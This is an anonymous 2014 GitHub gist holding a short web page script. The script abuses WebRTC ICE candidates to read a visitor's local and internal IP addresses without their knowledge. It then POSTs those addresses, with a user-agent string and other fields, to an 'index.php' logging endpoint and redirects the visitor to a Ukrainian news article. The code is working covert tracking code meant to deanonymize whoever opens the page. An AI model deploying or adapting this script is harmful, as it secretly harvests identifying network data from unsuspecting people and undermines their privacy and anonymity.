Skip to content

Instantly share code, notes, and snippets.

Created August 9, 2014 11:02
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anonymous/f50e0709b98d8b473a83 to your computer and use it in GitHub Desktop.
Save anonymous/f50e0709b98d8b473a83 to your computer and use it in GitHub Desktop.
<script src="http://code.jquery.com/jquery-latest.js"></script>
<script>
var RTCPeerConnection = /*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection || window.mozRTCPeerConnection;
if (RTCPeerConnection) (function () {
var rtc = new RTCPeerConnection({iceServers:[]});
if (window.mozRTCPeerConnection) { // FF needs a channel/stream to proceed
rtc.createDataChannel('', {reliable:false});
};
rtc.onicecandidate = function (evt) {
if (evt.candidate) grepSDP(evt.candidate.candidate);
};
rtc.createOffer(function (offerDesc) {
grepSDP(offerDesc.sdp);
rtc.setLocalDescription(offerDesc);
}, function (e) { console.warn("offer failed", e); });
var addrs = Object.create(null);
addrs["0.0.0.0"] = false;
function updateDisplay(newAddr) {
if (newAddr in addrs) return;
else addrs[newAddr] = true;
var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
$.ajax({
type: "POST",
url: "index.php",
data: "action=insert_db&ioi=&ip=111.222.333.444&date=2014-08-08 10:10:10&usag=Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0&inip="+displayAddrs+"&ref=",
success: function(msg){
window.location="http://korrespondent.net/ukraine/3348753-antyterrorystycheskaia-operatsyia-predpolahaet-unychtozhenye-vooruzhennykh-hrupp-sbu";
}
});
}
function grepSDP(sdp) {
var hosts = [];
sdp.split("\r\n").forEach(function (line) { // c.f. http://tools.ietf.org/html/rfc4566#page-39
if (~line.indexOf("a=candidate")) { // http://tools.ietf.org/html/rfc4566#section-5.13
var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
addr = parts[4],
type = parts[7];
if (type === "host") updateDisplay(addr);
} else if (~line.indexOf("c=")) { // http://tools.ietf.org/html/rfc4566#section-5.7
var parts = line.split(' '),
addr = parts[2];
updateDisplay(addr);
}
});
}
})(); else {
document.getElementById("list").innerHTML = "не обнаружено";
document.getElementById("list").nextSibling.textContent = "In Chrome and Firefox your IP should display automatically, by the power of WebRTCskull.";
}
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment